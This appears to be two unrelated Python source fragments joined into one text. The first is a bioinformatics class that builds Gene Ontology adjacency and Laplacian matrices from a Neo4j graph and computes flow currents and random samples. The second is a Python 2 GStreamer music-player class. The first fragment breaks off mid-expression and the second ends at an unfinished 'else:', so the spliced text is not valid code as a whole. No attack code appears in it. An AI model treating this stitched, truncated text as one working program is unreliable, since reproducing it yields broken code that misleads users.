log.info("_background: %d, entity_2_terms_neo4j_ids %s" % (len(self._background),
len(self.known_up_ids)))
if self._background:
if _is_int(self._background[0]):
self._background = list(set(self.known_up_ids).intersection(
set(self._background)))
else:
self._background = [(_id, _weight)
for _id, _weight in self._background
if _id in self.known_up_ids]
else:
self._background = list(self.known_up_ids)
self._undump_matrices()
self._undump_informativities()
self._undump_inflated_elements()
def annotome_access_and_structure(self, ontology_source=('Gene Ontology')):
"""
Loads the relationship betweenm the UNIPROTS and annotome as one giant dictionary,
then between the GO terms themselves
:param ontology_source:
:return:
"""
all_nodes_dict, edges_list = DatabaseGraph.parse_knowledge_entity_net()
term_counter = 0
self._limiter_reachable_nodes_dict = defaultdict(lambda: (set(), set(), set(), set()))
# basically (pure up, out reg, pure down, in_reg)
for node_id, node_obj in all_nodes_dict.items():
# uniprot parse
if list(node_obj.labels)[0] == 'UNIPROT':
self.up_neo4j_id_2_leg_id_disp_name[node_id] = [node_obj['legacyID'],
node_obj['displayName']]
# ontology parse
else:
if ontology_source \
and node_obj['source'] not in ontology_source:
continue
if self.go_namespace_filter \
and node_obj['Namespace'] not in self.go_namespace_filter:
continue
self.neo4j_id_2_display_name[node_id] = node_obj['displayName']
self.neo4j_id_2_legacy_id[node_id] = node_obj['legacyID']
self.legacy_id_2_neo4j_id[node_obj['legacyID']] = node_id
self.all_nodes_neo4j_ids.append(node_id) # there are also nodes that are annotated by GO
self.mat_idx_2_note_id[term_counter] = node_id
self.node_id_2_mat_idx[node_id] = term_counter
term_counter += 1
for rel_obj in edges_list:
start_id = rel_obj.start_node.id
end_id = rel_obj.end_node.id
# link uniprots with GO annotations
# except the linkage does not matter, because it can be linked by other sources
if ontology_source and all_nodes_dict[end_id]['source'] not in ontology_source:
continue
if ontology_source and all_nodes_dict[start_id]['parse_type'] == 'annotation' \
and all_nodes_dict[start_id]['source'] not in ontology_source:
continue
# Uniprot will always be first.
if self.go_namespace_filter \
and all_nodes_dict[end_id]['Namespace'] not in self.go_namespace_filter:
continue
# however, both annotations need to be of correct namespace.
if self.go_namespace_filter \
and all_nodes_dict[start_id]['parse_type'] == 'annotation'\
and all_nodes_dict[start_id]['Namespace'] not in self.go_namespace_filter:
continue
if rel_obj['parse_type'] == 'annotates':
self.term_2_entities_neo4j_ids[end_id].append(start_id) # because uniprots are first
self.entity_2_terms_neo4j_ids[start_id].append(end_id)
# link annotations between them:
else: # el_obj['parse_type'] == 'annotation_relationship':
# for that we actually will need to build a more complicated
# OPTIMIZE: to match the previous way it functioned we would have needed to
# more up only, not down/sideways. Basically find all the UPs and run the cycle
# of rel>GO>rel>GO>rel>GO maps until we are out of Uniprots.
# OPTIMIZE: that would also allow us to eliminate the overly complex
# self.get_go_reach
# That would define:
# - self._limiter_go_2_up_reachable_nodes
# - self._limiter_go_2_up_step_reachable_nodes
# - self._limiter_up_2_go_reachable_nodes
# - self._limiter_up_2_go_step_reachable_nodes
# - GO2_Pure_Inf
# - _limiter_go_2_weighted_ent
# The final decision is that to save the time we will stick with what
# there was already before.
if rel_obj.type in self._go_up_types:
self._limiter_reachable_nodes_dict[start_id][0].add(end_id)
self._limiter_reachable_nodes_dict[end_id][2].add(start_id)
elif rel_obj.type in self._go_reg_types:
self._limiter_reachable_nodes_dict[start_id][1].add(end_id)
self._limiter_reachable_nodes_dict[end_id][3].add(start_id)
self._limiter_reachable_nodes_dict = dict(self._limiter_reachable_nodes_dict)
for key in self._limiter_reachable_nodes_dict.keys():
payload = self._limiter_reachable_nodes_dict[key]
self._limiter_reachable_nodes_dict[key] = (list(payload[0]),
list(payload[1]),
list(payload[2]),
list(payload[3]))
self.term_2_entities_neo4j_ids = dict(self.term_2_entities_neo4j_ids)
self.entity_2_terms_neo4j_ids = dict(self.entity_2_terms_neo4j_ids)
self.known_up_ids = self.entity_2_terms_neo4j_ids.keys()
def get_go_adjacency_and_laplacian(self, include_reg=True):
"""
Builds Undirected and directed adjacency matrices for the GO set and
:param include_reg: if True, the regulation set is included into the matrix
:warning: if the parameter above is set to False, get_GO_reach module will be
unable to function.
"""
def build_adjacency():
"""
Builds undirected adjacency matrix for the GO transitions
"""
base_matrix = lil_matrix((len(self.all_nodes_neo4j_ids), len(self.all_nodes_neo4j_ids)))
# REFACTOR: [BKI normalization] "package" should be a named tuple
for node, package in self._limiter_reachable_nodes_dict.items():
fw_nodes = package[0]
if include_reg:
fw_nodes += package[1]
for node2 in fw_nodes:
idx = (self.node_id_2_mat_idx[node], self.node_id_2_mat_idx[node2])
base_matrix[idx] = 1
idx = (idx[1], idx[0])
base_matrix[idx] = 1
self.adjacency_matrix = copy(base_matrix)
def build_dir_adj():
"""
Builds directed adjacency matrix for the GO transitions
"""
base_matrix = lil_matrix((len(self.all_nodes_neo4j_ids), len(self.all_nodes_neo4j_ids)))
for node, package in self._limiter_reachable_nodes_dict.items():
fw_nodes = package[0]
if include_reg:
fw_nodes += package[1]
for node2 in fw_nodes:
idx = (self.node_id_2_mat_idx[node], self.node_id_2_mat_idx[node2])
base_matrix[idx] = 1
self.dir_adj_matrix = copy(base_matrix)
build_adjacency()
build_dir_adj()
def calculate_informativity(self, number, key=None):
"""
returns an entropy given by a number of equi-probable events, where event is the number.
:param number:
"""
# REFACTOR: [Better weights]: rewrite informativity/weight calculation according to a
# loadable policy function
if not self.total_entropy:
self.total_entropy = - \
math.log(1. / len(self.known_up_ids), 2)
if number < 1.0:
# It actually possible now, the results just won't be used anymore
log.debug("Term (%s) without reach (%.2f) encountered in informativity calculation "
% (key, number))
return 10 * self.total_entropy
# raise Exception("Wrong value (%.2f) provided for entropy computation of %s" % (number,
# key)
if number == 1.0:
return 2 * self.total_entropy
return pow(-self.correction_factor[0] * self.total_entropy /
math.log(1 / float(number), 2), self.correction_factor[1])
# REFACTOR: [Maintenability]: method is excessively complex (cyc. complexity ~ 18).
def get_go_reach(self):
"""
Recovers by how many different uniprots each GO term is reached, both in
distance-agnostic and distance-specific terms.
:raise Exception: if the reaches are not equivalent
:raise Exception: if null section in a non-nul patch
"""
def verify_equivalence_of_reaches(step_reach, reach):
"""
:param step_reach:
:param reach:
:raise Exception: if the reaches are not equivalent
"""
dict_len = {key: [len(val), len(list(step_reach[key].keys()))]
for key, val in reach.items()}
for key, val in dict_len.items():
if val[1] != val[0]:
log.critical(
'Reach exploration results not equivalent! Please report the error.')
raise Exception(
'Reach exploration results not equivalent! Please report the error.')
def special_sum(_val_dict, filter_function=lambda x: x + 1.0):
"""
Special sum used for the computation of staged informativity of different terms
:param _val_dict:
:param filter_function:
:raise Exception:
"""
summer = 0
for key, val_list in _val_dict.items():
summer += filter_function(key) * len(val_list)
return summer
dir_reg_path = shortest_path(self.dir_adj_matrix, directed=True, method='D')
dir_reg_path[np.isinf(dir_reg_path)] = 0.0 # potential problem from pycharm
dir_reg_path = lil_matrix(dir_reg_path)
# Load all the GOs that can potentially be reached
self._limiter_go_2_up_reachable_nodes = dict((el, []) for el in list(self._limiter_reachable_nodes_dict.keys()))
# Load all the UPs that are reached directly from the GO nodes.
self._limiter_go_2_up_reachable_nodes.update(self.term_2_entities_neo4j_ids)
pre_go2up_step_reachable_nodes = dict((key, dict((v, 0) for v in val))
for key, val in self._limiter_go_2_up_reachable_nodes.items())
# when called on possibly un-encoutenred items, anticipate a default
# value of 100 000
# Now just scan vertical columns and add UP terms attached
for idx1, idx2 in zip(list(dir_reg_path.nonzero()[0]),
list(dir_reg_path.nonzero()[1])):
# add UPs annotated by a node to all more general terms.
self._limiter_go_2_up_reachable_nodes[self.mat_idx_2_note_id[idx2]] +=\
self._limiter_go_2_up_reachable_nodes[self.mat_idx_2_note_id[idx1]]
if dir_reg_path[idx1, idx2] < 1.0:
log.critical("null in non-null patch")
raise Exception("null in non-null patch")
step_reach_upgrade = dict(
(key, val + dir_reg_path[idx1, idx2])
for key, val in pre_go2up_step_reachable_nodes[self.mat_idx_2_note_id[idx1]].items())
for k, v in step_reach_upgrade.items():
pre_go2up_step_reachable_nodes[
self.mat_idx_2_note_id[idx2]][k] = min(
pre_go2up_step_reachable_nodes[
self.mat_idx_2_note_id[idx2]].setdefault(
k, 100000), v)
for key, val in self._limiter_go_2_up_reachable_nodes.items():
self._limiter_go_2_up_reachable_nodes[key] = list(set(val))
verify_equivalence_of_reaches(
pre_go2up_step_reachable_nodes,
self._limiter_go_2_up_reachable_nodes)
# Now we need to invert the reach to get the set of all the primary and
# derived GO terms that describe a UP
self._limiter_up_2_go_reachable_nodes = dict(
(key, []) for key in self.known_up_ids)
self._limiter_up_2_go_step_reachable_nodes = dict(
(key, defaultdict(list)) for key in self.known_up_ids)
self._limiter_go_2_up_step_reachable_nodes = dict(
(key, defaultdict(list)) for key in list(pre_go2up_step_reachable_nodes.keys()))
for key, val_dict in pre_go2up_step_reachable_nodes.items():
for k, v in val_dict.items():
self._limiter_go_2_up_step_reachable_nodes[key][v].append(k)
self._limiter_up_2_go_step_reachable_nodes[k][v].append(key)
self._limiter_up_2_go_reachable_nodes[k].append(key)
# and finally we compute the pure and weighted informativity for each
# term
self.GO2_Pure_Inf = dict((key, self.calculate_informativity(len(val), key))
for key, val in self._limiter_go_2_up_reachable_nodes.items())
self._limiter_go_2_weighted_ent = dict((key, self.calculate_informativity(special_sum(val_dict)))
for key, val_dict in self._limiter_go_2_up_step_reachable_nodes.items())
def get_laplacians(self):
"""
Recovers the Laplacian (information conductance) matrixes for the GO annotation terms.
For weighted laplacian, currently implements a Max-Ent with custom factor as transition
price.
:warning: for this method to function, get_GO reach function must be run first.
:warning: accounting for regulatory relation relation between the GO terms is performed
if has been done in the adjunction matrix computation
"""
base_matrix = -copy(self.dir_adj_matrix)
nz_list = copy(
list(zip(list(base_matrix.nonzero()[0]), list(base_matrix.nonzero()[1]))))
# REFACTOR: [Better weights]: change that to a version using a function to calculate the
# weights (weigting policy)
for idx1, idx2 in nz_list:
min_inf = min(
self.GO2_Pure_Inf[self.mat_idx_2_note_id[idx1]],
self.GO2_Pure_Inf[self.mat_idx_2_note_id[idx2]])
base_matrix[idx1, idx2] = -min_inf
base_matrix[idx2, idx1] = -min_inf
base_matrix[idx2, idx2] += min_inf
base_matrix[idx1, idx1] += min_inf
self.laplacian_matrix = base_matrix
def compute_uniprot_dict(self):
"""
Unused.
Computes the uniprot method required by a third-party method
:return:
"""
uniprot_dict = {}
for elt in self.up_neo4j_id_2_leg_id_disp_name.keys():
node = DatabaseGraph.get(elt, 'UNIPROT')
alt_id = node['legacyID']
uniprot_dict[alt_id] = (
elt, self.up_neo4j_id_2_leg_id_disp_name[elt][1]) # UP_Name
uniprot_dict[elt] = alt_id
pickle.dump(uniprot_dict, open(confs.Dumps.Up_dict_dump, 'wb'))
return uniprot_dict
def filter_out_too_specific(self):
"""
Filters out GO terms that are too specific and builds a directed, undirected adjacency
maps and laplacian.
"""
rep_val = self.calculate_informativity(self.ultraspec_lvl)
self.ultraspec_cleaned = True
ultraspec_go_terms = list(GO
for GO, reach
in self._limiter_go_2_up_reachable_nodes.items()
if len(reach) < self.ultraspec_lvl)
for GO in ultraspec_go_terms:
self.GO2_Pure_Inf[GO] = rep_val
def md5_hash(self):
"""
Return the MD hash of self to ensure that all the defining properties have been
correctly defined before dump/retrieval
"""
sorted_initset = sorted(self.node_id_2_mat_idx.keys())
data = [
sorted_initset,
self.go_namespace_filter,
self.correction_factor,
self.ultraspec_cleaned,
self.ultraspec_lvl,
confs.line_loss,
confs.use_normalized_laplacian,
confs.fraction_edges_dropped_in_laplacian]
md5 = hashlib.md5(json.dumps(data, sort_keys=True).encode('utf-8')).hexdigest()
log.debug("System md5 hashing done. hash: %s. parameters: \n"
"\t sorted init set hash: %s \n"
"\t bki environment paramters: %s|%s|%s|%s\n"
"\t line loss: %s\n"
"\t l_norm: %s\n"
"\t edge drop: %s\n"
% (md5,
hashlib.md5(json.dumps(sorted_initset, sort_keys=True).encode('utf-8')).hexdigest(),
self.go_namespace_filter,
self.correction_factor,
self.ultraspec_cleaned,
self.ultraspec_lvl,
confs.line_loss,
confs.use_normalized_laplacian,
confs.fraction_edges_dropped_in_laplacian))
return str(md5)
def active_sample_md5_hash(self, sparse_rounds):
"""
Performs a hash of characteristics of loaded primary hits list, secondary hits list,
and background with flow calculation methods. Basically, everything needed to know if a
random sample is relevant to the currently loaded sample
:param sparse_rounds: -1 if dense flow calculation, otherwise sparse sampling parameter
:return:
"""
sys_hash = self.md5_hash()
background = []
if self._background:
if _is_int(self._background[0]):
background = sorted(self._background)
else:
background = sorted(self._background, key=lambda x: x[1])
sample_chars = characterize_flow_parameters(self._active_weighted_sample,
self._secondary_weighted_sample,
sparse_rounds)
hashlib.md5(json.dumps(background, sort_keys=True).encode(
'utf-8')).hexdigest()
data = [
sys_hash,
background,
self._flow_calculation_method.__name__,
sparse_rounds,
sample_chars[0], sample_chars[1], sample_chars[2],
sample_chars[3], sample_chars[4], sample_chars[5],
sample_chars[6], sample_chars[7]
]
md5 = hashlib.md5(json.dumps(data, sort_keys=True).encode('utf-8')).hexdigest()
log.debug('Active sample md5 hashing done: %s. parameters: \n'
'\tsys_hash: %s\n'
'\tbackground hash: %s\n'
'\tflow policy: %s\n'
'\tsparse sampling: %s\n'
'\tmain sample chars: %d/%d/%s\n'
'\tsec sample chars: %d/%d/%s\n'
'\tsparse sampling: %d\n'
'\toverall hash: %s' % (md5,
sys_hash,
hashlib.md5(
json.dumps(background, sort_keys=True).encode(
'utf-8')).hexdigest(),
self._flow_calculation_method.__name__,
sparse_rounds,
sample_chars[0], sample_chars[1], sample_chars[2],
sample_chars[3], sample_chars[4], sample_chars[5],
sample_chars[6], sample_chars[7]))
return str(md5)
def set_flow_sources(self, sample, secondary_sample):
"""
Sets the sample to analyze - primary and secondary sources
:param sample: primary sample being loaded
:param secondary_sample: secondary sample being loaded (None if none)
:return:
"""
def _verify_uniprot_ids(id_weight_vector: List[Tuple[int, float]]):
uniprots = np.array(id_weight_vector)[:, 0].astype(np.int).tolist()
if not set(uniprots) <= self.known_up_ids:
log.warn('Following reached uniprots neo4j_ids were not retrieved upon the '
'circulation matrix construction: \n %s',
(set(uniprots) - self.known_up_ids))
_filter = [True
if uniprot in self.known_up_ids
else False
for uniprot in uniprots]
pre_return = np.array(id_weight_vector)[_filter, :].tolist()
return [(id, val) for id, val in pre_return]
self._active_weighted_sample = _verify_uniprot_ids(reduce_and_deduplicate_sample(sample))
self._active_up_sample = np.array(self._active_weighted_sample)[:, 0].tolist()
if secondary_sample is not None:
log.debug('debug: secondary_weight sample %s' % secondary_sample)
self._secondary_weighted_sample = \
_verify_uniprot_ids(reduce_and_deduplicate_sample(secondary_sample))
# KNOWNBUG: logic bug occurs if the ids supplied have no annotations in the db
log.debug('debug: secondary_weight sample %s' % np.array(
self._secondary_weighted_sample))
self._active_up_sample = list(set(self._active_up_sample
+ np.array(self._secondary_weighted_sample)[:, 0].tolist()))
def evaluate_ops(self, sparse_rounds=-1):
"""
Evaluate the number of pairs of nodes that wlll be used for flow calculation
:param sparse_rounds: sparse rounds parameter, if -1 will be considered dense
:return:
"""
log.debug('evaluate_ops call')
ro = sampling_policies.characterize_flow_parameters(self._active_weighted_sample,
self._secondary_weighted_sample,
-2)
eo = self._ops_evaluation_method(ro[0], ro[3], sparse_rounds)
log.debug('BKI ops evaluation: %s, %s, %s, %s' % (ro[0], ro[3], sparse_rounds, eo))
return eo
def reduce_ops(self, ops_limit):
"""
Evaluates the value of the sparse_round parameter need to keep the number of pairs of
nodes used for flow calculation under a given budget
:param ops_limit: node pair budget
:return:
"""
log.debug('reduce_ops call')
ro = sampling_policies.characterize_flow_parameters(self._active_weighted_sample,
self._secondary_weighted_sample,
-2)
op_r = self._ops_reduction_method(ro[0], ro[3], ops_limit)
log.debug('BKI ops reduction: %s, %s, %s, %s' % (ro[0], ro[3], ops_limit, op_r))
return op_r
def inflate_matrix_and_indexes(self):
"""
Performs the laplacian matrix inflation to incorporate the uniprots on which we
will be running the analysis
"""
# branching distribution: at least 10x the biggest conductivity of the
# system, unless too specific, in which case ~ specific level
self.binding_intensity = 10 * self.calculate_informativity(self.ultraspec_lvl)
fixed_index = self.laplacian_matrix.shape[0]
up2idxs = dict((UP, fixed_index + Idx)
for Idx, UP in enumerate(self.known_up_ids))
idx2ups = dict((Idx, UP) for UP, Idx in up2idxs.items())
self.inflated_laplacian = lil_matrix(
(self.laplacian_matrix.shape[0] + len(self.known_up_ids),
self.laplacian_matrix.shape[1] + len(self.known_up_ids)))
self.inflated_laplacian[:self.laplacian_matrix.shape[0], :self.laplacian_matrix.shape[1]] =\
self.laplacian_matrix
for uniprot in self.known_up_ids:
for go_term in self.entity_2_terms_neo4j_ids.get(uniprot, []): # should never hit the [] though
self.inflated_laplacian[
up2idxs[uniprot], up2idxs[uniprot]] += self.binding_intensity
self.inflated_laplacian[
self.node_id_2_mat_idx[go_term], self.node_id_2_mat_idx[go_term]] += self.binding_intensity
self.inflated_laplacian[
self.node_id_2_mat_idx[go_term], up2idxs[uniprot]] -= self.binding_intensity
self.inflated_laplacian[
up2idxs[uniprot], self.node_id_2_mat_idx[go_term]] -= self.binding_intensity
self.inflated_lbl2idx = copy(self.node_id_2_mat_idx)
self.inflated_lbl2idx.update(up2idxs)
self.inflated_idx2lbl = copy(self.mat_idx_2_note_id)
self.inflated_idx2lbl.update(idx2ups)
def set_uniprot_source(self, uniprots):
"""
Sets the deprecated_reached_uniprots_neo4j_id_list on which the circulation computation routines
will be performed by the otehr methods.Avoids passing as argument large lists of parameters.
:param uniprots: List of node IDs of the uniprots on which we would like to perform
current computations
:raise Warning: if the uniprots were not present in the set of GOs for which we
built the system or had no GO attached to them
"""
if not set(uniprots) <= self.known_up_ids :
na_set = set(uniprots) - self.known_up_ids
log.warning('%s uniprots out of %s either were not present in the constructions set '
'or have no GO terms attached to them.', len(na_set), len(set(uniprots)))
log.debug('full list of uniprots that cannot be analyzed: \n%s', na_set)
self._active_up_sample = [uniprot for uniprot in uniprots if uniprot in self.known_up_ids]
def compute_current_and_potentials(
self,
memoized: bool = True,
incremental: bool = False, # This should always be false and was used in order to
# resume the sampling
cancellation: bool = False,
sparse_rounds: int = -1,
potential_dominated: bool = True):
"""
Builds a conduction matrix that integrates uniprots, in order to allow an easier
knowledge flow analysis
:param memoized: if the tensions and individual relation matrices should be stored in
the matrix and dumped at the end computation (required for submatrix re-computation)
:param incremental: if True, all the circulation computation will be added to the
existing ones. Useful for the computation of particularly big systems with
intermediate dumps
:param cancellation: divides the final current by #Nodes**2/2, i.e. makes the currents
comparable between circulation systems of different sizes.
:param sparse_rounds: if set to a positive integer the sampling will be sparse and
not dense, i.e. instead of computation for each node pair, only an estimation will be
made, equal to computing sparse sampling association with other randomly chosen nodes
:param potential_dominated: if the total current is normalized to potential
:return: adjusted conduction system
"""
if not incremental or self.current_accumulator == np.zeros((2, 2)):
self.current_accumulator = lil_matrix(self.inflated_laplacian.shape)
self.UP2UP_voltages = {}
self.uniprots_2_voltage = {}
weighted_up_pairs = self._flow_calculation_method(self._active_weighted_sample,
self._secondary_weighted_sample,
sparse_rounds)
# pairs in the list of pairs are now guaranteed to be weighted
total_pairs = len(weighted_up_pairs)
breakpoints = 300
previous_time = time()
for counter, (up_w_id_1, up_w_id_2) in enumerate(weighted_up_pairs):
up_id_1, w_1 = up_w_id_1
up_id_2, w_2 = up_w_id_2
mean_weight = (w_1 + w_2) / 2.
idx1, idx2 = (self.inflated_lbl2idx[up_id_1], self.inflated_lbl2idx[up_id_2])
pre_reach = self._limiter_up_2_go_reachable_nodes[up_id_1] + \
self._limiter_up_2_go_reachable_nodes[up_id_2] + \
[up_id_1] + [up_id_2]
reach = [self.inflated_lbl2idx[label] for label in pre_reach]
current_upper, potential_diff = cr.group_edge_current_with_limitations(
inflated_laplacian=self.inflated_laplacian,
idx_pair=(idx1, idx2),
reach_limiter=reach)
self.UP2UP_voltages[tuple(sorted((up_id_1, up_id_2)))] = potential_diff
if potential_dominated:
if potential_diff != 0:
current_upper = current_upper / potential_diff
else:
log.warning('pairwise flow. On indexes %s %s potential difference is null. %s',
up_id_1, up_id_2, 'Tension-normalization was aborted')
self.current_accumulator = self.current_accumulator + \
cr.sparse_abs(current_upper) * mean_weight
if counter % breakpoints == 0 and counter > 1:
# TODO: [load bar] the internal loop load bar goes here
compops = float(breakpoints) / (time() - previous_time)
mins_before_termination = (total_pairs - counter) / compops // 60
finish_time = datetime.datetime.now() + datetime.timedelta(minutes=mins_before_termination)
log.info("thread hex: %s; progress: %s/%s, current speed: %.2f compop/s, "
"time remaining: "
"%.0f "
"min, finishing: %s "
% (self.thread_hex, counter, total_pairs, compops, mins_before_termination,
finish_time.strftime("%m/%d/%Y, %H:%M:%S")))
previous_time = time()
self.current_accumulator = triu(self.current_accumulator)
if cancellation:
self.current_accumulator /= float(total_pairs)
index_current = cr.get_current_through_nodes(self.current_accumulator)
log.info('current accumulator shape %s, sum %s',
self.current_accumulator.shape, np.sum(self.current_accumulator))
self.node_current = dict((self.inflated_idx2lbl[idx], val)
for idx, val in enumerate(index_current))
if memoized:
self._dump_memoized()
def format_node_props(self, node_current, limit=0.01):
"""
Formats the nodes for the analysis by in the knowledge_access_analysis module
:param node_current: Current through the GO nodes
:param limit: hard limit to go_namespace_filter out the GO terms with too little current
(compensates the minor currents in the gird)s
:return: {GO:[node current, pure GO informativity, Number of reachable nodes]}
"""
characterization_dict = {}
limiting_current = max(node_current.values()) * limit
log.debug('formatting node props with %.2f limiting current' % limiting_current)
for go_term in self.node_id_2_mat_idx.keys():
if node_current[go_term] > limiting_current:
characterization_dict[go_term] = [
node_current[go_term],
self.GO2_Pure_Inf[go_term],
len(self._limiter_go_2_up_reachable_nodes[go_term])]
# should never occur, unless single node is a massive outlier
if len(characterization_dict) < 2:
characterization_dict = self.format_node_props(node_current, limit/100)
return characterization_dict
def export_conduction_system(self,
p_value_dict: dict = None,
output_location: str = ''):
"""
Computes the conduction system of the GO terms and exports it to the GDF format
and flushes it into a file that can be viewed with Gephi
:param p_value_dict:
:raise Warning:
"""
node_char_names = [
'Current',
'Type',
'Legacy_ID',
'Names',
'Pure_informativity',
'Confusion_potential',
'p-value',
'p_p-value',
'Source_W']
node_char_types = [
'DOUBLE',
'VARCHAR',
'VARCHAR',
'VARCHAR',
'DOUBLE',
'DOUBLE',
'DOUBLE',
'DOUBLE',
'DOUBLE']
if p_value_dict is None:
p_value_dict = defaultdict(lambda: (np.nan, np.nan, np.nan))
nan_neg_log10 = lambda x: x if type(x) is str else -np.log10(x)
char_dict = {}
for GO in self.node_id_2_mat_idx.keys():
char_dict[GO] = [str(self.node_current[GO]),
'GO',
self.neo4j_id_2_legacy_id[GO],
self.neo4j_id_2_display_name[GO].replace(',', '-'),
str(self.GO2_Pure_Inf[GO]),
str(len(self._limiter_go_2_up_reachable_nodes[GO])),
str(p_value_dict[int(GO)][0]),
str(nan_neg_log10(p_value_dict[int(GO)][0])),
'0']
for UP in self._active_up_sample:
in_sample_weight = 1
for node, weight in self._active_weighted_sample:
if UP == node:
in_sample_weight = weight
if self._secondary_weighted_sample is not None:
for node, weight in self._secondary_weighted_sample:
if UP == node:
in_sample_weight = -weight
char_dict[UP] = [str(self.node_current[UP]),
'UP',
self.up_neo4j_id_2_leg_id_disp_name[UP][0], # UP leg ID/name
str(self.up_neo4j_id_2_leg_id_disp_name[UP][1]).replace(',', '-'),
str(self.binding_intensity),
'1',
'0.05',
'1.3',
str(in_sample_weight)]
if output_location == '':
output_location = NewOutputs().GO_GDF_output
gdf_exporter = GdfExportInterface(
target_fname=output_location,
field_names=node_char_names,
field_types=node_char_types,
node_properties_dict=char_dict,
min_current=0.01,
index_2_label=self.inflated_idx2lbl,
label_2_index=self.inflated_lbl2idx,
current_matrix=self.current_accumulator)
# TODO: [Better stats]: twister compared to random sample?
gdf_exporter.write()
def randomly_sample(
self,
random_samples,
sparse_rounds: int = -1,
no_add=False,
pool_no=None,
sampling_policy=sampling_policies.matched_sampling,
optional_sampling_param='exact'):
"""
Randomly samples the set of deprecated_reached_uniprots_neo4j_id_list used to create the model.
This is the null model creation routine
:param random_samples: how many times we would like to sample each unirot number
:param sparse_rounds: if we want to use sparse sampling
(useful in case of large uniprot sets),
:param no_add: if set to True, the result of sampling will not be added to the database
of samples. Useful if re-running tests with similar parameters several times.
:param pool_no: explicit sampling pool number (used for reporting/debugging)
:param sampling_policy: sampling policy used
:param optional_sampling_param: sampling policy optional argument
"""
sample_chars = characterize_flow_parameters(self._active_weighted_sample,
self._secondary_weighted_sample, sparse_rounds)
super_hash = sample_chars[7]
log.info('Starting a random sampler: \n'
'\tsampling policy & optional param: %s/%s\n'
'\tflow policy: %s\n'
'\tsparse sampling: %s\n'
'\tmain sample chars: %d/%d/%s\n'
'\tsec sample chars: %d/%d/%s\n'
'\tsparse sampling: %d\t'
'\toverall hash: %s' % (sampling_policy.__name__, optional_sampling_param,
self._flow_calculation_method.__name__,
sparse_rounds,
sample_chars[0], sample_chars[1], sample_chars[2],
sample_chars[3], sample_chars[4], sample_chars[5],
sample_chars[6], sample_chars[7]))
preserved_sample = self._active_weighted_sample.copy()
if self._secondary_weighted_sample is not None:
preserved_sec_sample = self._secondary_weighted_sample.copy()
else:
preserved_sec_sample = None
for i, sample, sec_sample in sampling_policy(preserved_sample,
preserved_sec_sample,
self._background,
random_samples,
optional_sampling_param):
self.set_flow_sources(sample, sec_sample)
sample_chars = characterize_flow_parameters(sample, sec_sample, sparse_rounds)
sample_hash = sample_chars[-1]
log.info('Sampling thread: %s, Thread hex: %s; Random sample %d/%d \n'
'sampling characteristics: sys_hash: %s, sample_hash: %s, '
'target_hash: %s' %
(pool_no, self.thread_hex, i, random_samples,
self.md5_hash(), sample_hash, super_hash))
# TODO: [load bar]: the external loop progress bar goes here
# TODO: [fast resurrection] fast resurrection is impossible (memoized is false,
# but pipeline is broken)
self.compute_current_and_potentials(memoized=False, sparse_rounds=sparse_rounds)
sample_ids_md5 = hashlib.md5(
json.dumps(
sorted(self._active_up_sample),
sort_keys=True).encode('utf-8')).hexdigest()
if not no_add:
log.info("Sampling thread %s: Adding a blanc:"
"\t sys hash: %s "
"\t sample hash: %s \t active sample hash: %s \t target_hash: %s \t "
"sparse_rounds: %s \t sampling policy: %s\t sampling_options: %s \t "
"matrix weight: %s"
% (pool_no, self.md5_hash(),
sample_hash, self.active_sample_md5_hash(sparse_rounds), super_hash,
sparse_rounds, sampling_policy.__name__, optional_sampling_param,
np.sum(self.current_accumulator)))
insert_annotome_rand_samp(
{
'UP_hash': sample_ids_md5,
'sys_hash': self.md5_hash(),
'active_sample_hash': self.active_sample_md5_hash(sparse_rounds),
'target_sample_hash': super_hash,
'sampling_policy': sampling_policy.__name__,
'sampling_policy_options': optional_sampling_param,
'sparse_rounds': sparse_rounds,
'UPs': pickle.dumps(self._active_up_sample),
'sample': pickle.dumps(self._active_weighted_sample),
'sec_sample': pickle.dumps(self._secondary_weighted_sample),
'currents': pickle.dumps(
(self.current_accumulator,
self.node_current)),
'voltages': pickle.dumps(
self.UP2UP_voltages)})
self._active_weighted_sample = preserved_sample
self._secondary_weighted_sample = preserved_sec_sample
def get_independent_linear_groups(self):
"""
Recovers independent linear groups of the GO terms. Independent linear groups are
those that share a significant amount of reached_uniprots_neo4j_id_list in common
"""
self.indep_lapl = lil_matrix((len(self.all_nodes_neo4j_ids), len(self.all_nodes_neo4j_ids)))
for GO_list in self._limiter_up_2_go_reachable_nodes.values():
for GO1, GO2 in combinations(GO_list, 2):
idx1, idx2 = (self.node_id_2_mat_idx[GO1], self.node_id_2_mat_idx[GO2])
self.indep_lapl[idx1, idx2] += -1
self.indep_lapl[idx2, idx1] += -1
self.indep_lapl[idx2, idx2] += 1
self.indep_lapl[idx1, idx1] += 1
if __name__ == '__main__':
# Creates an instance of MatrixGetter and loads pre-computed values
go_interface_instance = GeneOntologyInterface(
background=get_background_bulbs_ids())
go_interface_instance.full_rebuild()
# loading takes 1-6 seconds.
# fill for reach only is done in 2 seconds,
# tepping takes another 15,
# inverting + info computation - 1 more second
# Laplacian building =>
##
# full computation - 3 minutes 18 seconds; save 7 seconds, retrieval - 3
# seconds
# go_interface_instance.fast_load()
# print go_interface_instance.pretty_time()
# go_interface_instance.get_indep_linear_groups()
# go_interface_instance.dump_Indep_Linset()
# go_interface_instance.randomly_sample([10, 25], [5]*2, chromosome_specific=15)
# go_interface_instance.set_Uniprot_source(experimental)
# go_interface_instance.compute_current_and_potentials(sparse_rounds=10)
# go_interface_instance.export_conduction_system()
# go_interface_instance.deprecated_export_subsystem(experimental, ['186958', '142401', '147798', '164077'])
# data_array = np.array([log(val) for val in go |
#!/usr/bin/env python2
import time
import thread
import json
import gst
class Player(object):
def __init__(self, on_end = None):
self.current = None
self.progress = 0
self.length = 0
self.playing = False
self.on_end = on_end
self.playbin = gst.element_factory_make("playbin2", "player")
thread.start_new_thread(self._loop, ())
def _loop(self):
while True:
time.sleep(1)
if not self.playing:
continue
try:
self.progress = self.playbin.query_position(gst.FORMAT_TIME, None)[0] / 1000000000
self.length = self.playbin.query_duration(gst.FORMAT_TIME, None)[0] / 1000000000
except:
pass
if self.progress > 0 and self.progress >= self.length:
self.stop()
if self.on_end:
self.setSong(self.on_end())
self.play()
def setSong(self, song):
self.current = song
def play(self):
if not self.current and self.on_end:
self.setSong(self.on_end())
if self.current:
self.playbin.set_property("uri", self.current.url)
self.playing = True
self.playbin.set_state(gst.STATE_PLAYING)
def stop(self):
self.playing = False
self.progress = self.length = 0
self.playbin.set_state(gst.STATE_NULL)
def pause(self):
self.playing = False
self.playbin.set_state(gst.STATE_PAUSED)
def info(self):
if not self.playing:
return json.dumps({ 'status': 'not playing' })
else:
